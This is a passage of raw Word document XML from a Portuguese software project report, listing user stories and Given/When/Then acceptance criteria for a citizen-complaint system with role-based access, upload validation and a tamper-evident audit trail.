      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">envolve o método do controlador; quando o Spring Security recusa a requisição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chegar ao controlador, o método nunca executa e nada é registrado. Ou seja: as recusas mais interessantes, as bloqueadas por rota, eram justamente as que não deixavam rastro. É exatamente o oposto do que recomenda a OWASP, que lista</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Authorization (access control) failures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entre os eventos que devem sempre ser registrados (OWASP, [s.d.]b). A correção está descrita na seção 5.4.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="Xdce5483ced0a0b0082c696017b58c920eaf8a34"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 Novas user stories de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">manipulação de arquivos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3"/>
        <w:gridCol w:w="5280"/>
        <w:gridCol w:w="1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cidadão</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero anexar evidências pela API, para não esbarrar no limite de armazenamento do navegador nem perder o anexo ao trocar de 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gestor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero baixar uma evidência com registro de quem acessou e quando, para que o acesso à prova seja rastreável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gestor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero exportar as denúncias em CSV, com a exportação registrada em auditoria, para analisar os dados em ferramenta externa sem criar uma via de vazamento silenciosa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encarregado de dados</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero que o sistema recuse arquivos cujo conteúdo não corresponde ao formato declarado, para que a extensão do arquivo não seja aceita como prova do que ele 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gestor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero remover um anexo informando o motivo, para corrigir um envio indevido sem que a remoção fique sem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</w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A US34 traduz para o backlog a recomendação central da OWASP sobre recebimento de arquivos: validar a assinatura do conteúdo contra o formato esperado, em vez de confiar na extensão (OWASP, [s.d.]c).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="nova-user-story-de-integração"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7 Nova user story de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">integração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43"/>
        <w:gridCol w:w="5280"/>
        <w:gridCol w:w="19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story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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">cidadão</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero que a denúncia que registro no portal chegue ao painel do órgão, para não depender de eu voltar no mesmo navegador para que ela exista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</w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A US31 nasceu de uma revisão contra o enunciado, e não de uma ideia nova. A API estava pronta e testada, o formulário React já a consumia, mas o portal principal e o painel continuavam gravando e lendo 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Uma denúncia registrada no site nunca chegava ao banco, e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">na mesma tela do gestor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a aba estatística descrevia 125 casos vindos do banco enquanto o Kanban ao lado mostrava apenas os daquele navegador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Foi a lacuna mais séria encontrada na fase, e a mais fácil de não notar:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cada parte funcionava isoladamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Os testes unitários passavam, a API respondia corretamente no Swagger, o front-end desenhava as telas sem erro no console. O defeito só era visível ao perguntar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esta denúncia que acabei de registrar aparece do outro lado?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que é uma pergunta que nenhum teste unitário faz. A seção 3.3.2 descreve a correção.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="64" w:name="Xb249a85925e9657aa98f69a1096c6b0e9822d75"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8 Critérios de aceitação das histórias prioritárias</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Formato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DADO / QUANDO / ENTÃO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Given/When/Then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Behaviour-Driven Development</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Foram escritos critérios para as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">doze histórias de prioridade Alta ou Crítica criadas nesta fase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mais a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">US17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que é de prioridade Média mas foi reaberta e reentregue aqui, e cujo critério é o que amarra a interface React à API. São treze conjuntos de critérios.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="51" w:name="us17-formulário-react-integrado-à-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.1 US17: formulário React integrado à API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cidadão abre o formulário React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preenche tipo e descrição e envia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componente executa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/denuncias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e exibe o protocolo devolvido pelo servidor, e não um protocolo gerado no navegador.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envio está em andamento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botão fica desabilitado com indicação de carregamento, impedindo envio duplicado por clique repetido.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API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por falha de validação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componente exibe a mensagem de erro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">no campo correspondente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aproveitando o corpo padronizado devolvido pelo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API está fora do ar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componente informa a indisponibilidade e oferece o registro em modo local, sem perder o texto já digitado.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denúncia é registrada com sucesso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score de confiabilidade exibido é o calculado pelo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ScoreService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no servidor, garantindo uma única fonte da verdade entre as duas interfaces.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="us19-consulta-à-trilha-de-auditoria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.2 US19: consulta à trilha de auditoria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usuário autenticado possui perfil AUDITOR ou ADMIN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acessa a aba Auditoria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sistema exibe os registros paginados em ordem decrescente de data e hora, com usuário, perfil, ação, recurso afetado e endereço IP.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usuário autenticado possui perfil GESTOR ou ATENDENTE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tenta acessar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/auditoria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API responde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e a própria tentativa é registrada na trilha.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auditor aplica um filtro por período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consulta é resolvida no banco com paginação, e não carregando toda a tabela em memória.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nenhum registro atende aos filtros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sistema exibe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nenhum registro de auditoria para os filtros selecionados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sem erro.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auditor tenta editar ou excluir um registro de auditoria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operação é recusada, porque a trilha é somente de escrita e leitura.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="us20-fila-de-priorização-automática"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.3 US20: fila de priorização automática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existem denúncias em aberto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o atendente abre a fila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sistema apresenta os casos ordenados por urgência atribuída pelo VigIA, depois por score de confiabilidade e, em caso de empate, pela denúncia mais antiga.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uma denúncia é classificada como CRÍTICA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ela assume o topo da fila independentemente do seu score.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atendente aciona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Atender próximo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”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caso é removido do topo da fila, seu status muda para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">em análise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e a ação é registrada em auditoria.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não há denúncias em aberto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fila exibe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nenhum caso aguardando atendimento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e o botão de atender fica desabilitado.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uma nova denúncia crítica chega enquanto a fila está aberta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ela é inserida na posição correta na próxima atualização, sem reordenar a lista inteira.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="us23-painel-estatístico-de-desempenho"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.4 US23: painel estatístico de desempenho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gestor acessa o painel estatístico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sistema exibe média, mediana, moda, desvio padrão e coeficiente de variação do tempo de resposta das denúncias.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tempo de resposta é calculado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ele corresponde ao intervalo entre o primeiro evento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recebida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e o evento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">concluída</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">registrados no histórico, contado em dias corridos fracionários.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existem denúncias ainda não concluídas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elas são excluídas do cálculo do tempo de resposta e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">reportadas separadamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como casos em aberto, com sua própria medida de espera.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coeficiente de variação ultrapassa 50 %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painel sinaliza que o atendimento está irregular entre os casos, indicando falta de padronização.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há menos de duas observações em um recorte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recorte é omitido, porque variância amostral com n = 1 é indefinida.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="55" w:name="us24-perfis-e-permissões"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.5 US24: perfis e permissões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usuário faz login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token JWT emitido carrega o perfil real do usuário, e o filtro de autenticação concede exatamente as autoridades desse perfil.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ATENDENTE consulta uma denúncia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recebe os dados operacionais do caso, mas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os campos de identificação do denunciante nem o endereço da ocorrência.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usuário sem o perfil exigido chama um endpoint protegido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API responde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com corpo padronizado,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sem revelar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a existência ou não do recurso.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token expirado é enviado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API responde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">401 Unauthorized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e o front-end redireciona para o login.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perfil declarado no token é desconhecido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sistema aplica o perfil de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">menor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">privilégio, errando para o lado de negar acesso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="56" w:name="us25-trilha-de-auditoria-imutável"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.6 US25: trilha de auditoria imutável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uma operação sensível é executada com sucesso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sistema grava um registro com data e hora, usuário, perfil, ação, recurso, identificador do recurso, endereço IP, agente do usuário e resultado.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uma operação sensível</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">falha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registro também é gravado, com o resultado marcado como NEGADO ou ERRO, porque tentativa recusada é informação de segurança.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novo registro é gravado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ele armazena o hash SHA-256 do registro imediatamente anterior, formando uma cadeia verificável.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registro intermediário da cadeia é alterado diretamente no banco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a verificação de integridade é executada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sistema aponta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">em qual posição</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a cadeia foi rompida e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">qual dos dois tipos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de adulteração ocorreu (conteúdo alterado ou registro removido/inserido).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registro de auditoria é gravado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ele contém a referência ao recurso,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nunca o conteúdo do relato da denúncia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque a trilha não pode virar uma segunda cópia do dado sensível.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="us26-mascaramento-por-perfil"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.7 US26: mascaramento por perfil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ATENDENTE abre o detalhe de uma denúncia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endereço da ocorrência volta como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[endereco protegido]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, substituído</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pelo servidor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e a listagem não traz endereço nem relato.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GESTOR abre o mesmo caso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endereço completo é exibido e a leitura é registrada como consulta sensível na auditoria.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modelo físico prevê a tabela</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CIDADAO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com nome, e-mail e telefone, vinculada à denúncia apenas quando ela não é anônima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rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MascaraUtil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">já implementa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">email()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telefone()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para esses campos. A implementação em execução ainda não persiste o denunciante identificado, e essa diferença entre modelo e implementação está declarada na seção 5.8.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denúncia é anônima de nível 1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nenhum perfil, em nenhuma tela, tem acesso a dado de identificação, porque esse dado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não existe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no sistema.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resposta da API é montada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ela é serializada a partir de um DTO específico da audiência, e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da entidade JPA diretamente.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mesmo caso é exportado em CSV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vale o mesmo mascaramento da tela, porque negar o endereço no detalhe e entregá-lo em lote numa planilha seria uma contradição.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="us28-upload-de-evidências-pela-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.8 US28: upload de evidências pela API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cidadão anexa um arquivo de até 5 MB em formato permitido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envia a denúncia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arquivo é transmitido por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, validado no servidor e vinculado à denúncia, e a API responde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arquivo excede o limite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API responde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">413 Content Too Large</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com mensagem clara, e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nada é gravado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arquivo tem extensão permitida mas conteúdo de outro tipo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servidor rejeita com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">415 Unsupported Media Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque a validação é feita sobre o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">conteúdo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e não sobre o nome do arquivo.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nome original do arquivo contém caracteres de caminho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nome é higienizado antes de qualquer gravação, e o arquivo é gravado sob um UUID, prevenindo travessia de diretório.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denúncia já tem 10 anexos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envio seguinte é recusado, e a mensagem informa o limite.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API está indisponível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front-end informa que o anexo não pôde ser enviado e permite registrar a denúncia sem ele,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">preservando o relato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="us29-download-auditado-de-evidência"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.9 US29: download auditado de evidência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usuário autorizado baixa uma evidência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sistema registra em auditoria quem baixou, qual evidência, de qual denúncia e quando.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SHA-256 do arquivo em disco não corresponde ao gravado no recebimento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download é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">recusado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque entregar como evidência um arquivo que não é mais o recebido é pior do que não entregar nada.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usuário não autorizado tenta baixar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API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e a tentativa é registrada.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identificador da evidência não existe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API responde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com corpo padronizado, sem diferenciar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">não existe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sem permissão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para quem não tem acesso.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arquivo é entregue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resposta traz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Disposition: attachment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, para que o navegador não interprete o conteúdo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="us31-portal-e-painel-servidos-pela-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.10 US31: portal e painel servidos pela API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cidadão registra uma denúncia no portal com a API no ar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protocolo e o score exibidos são os que o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">servidor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gerou, e não valores calculados no navegador.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denúncia foi registrada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o gestor abre o painel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ela aparece no Kanban, sem depender do navegador em que foi criada.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gestor arrasta um card entre colunas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mudança é gravada pelo servidor, entra na linha do tempo da denúncia e gera registro na trilha de auditoria.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servidor recusa a transição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tela é redesenhada com o estado real: o card volta à coluna de origem, em vez de mentir que a mudança ocorreu.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sincronização traz os dados da API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os campos que só existem no cliente (código de acompanhamento, mensagens do elo, nível de anonimato) são</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">preservados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e não sobrescritos.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API está fora do ar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painel volta ao modo local e a etiqueta de conexão declara isso, e os dados de exemplo, que só existem no modo local, deixam de se misturar aos reais.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:id="61" w:name="us32-ficha-completa-do-caso-no-painel"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
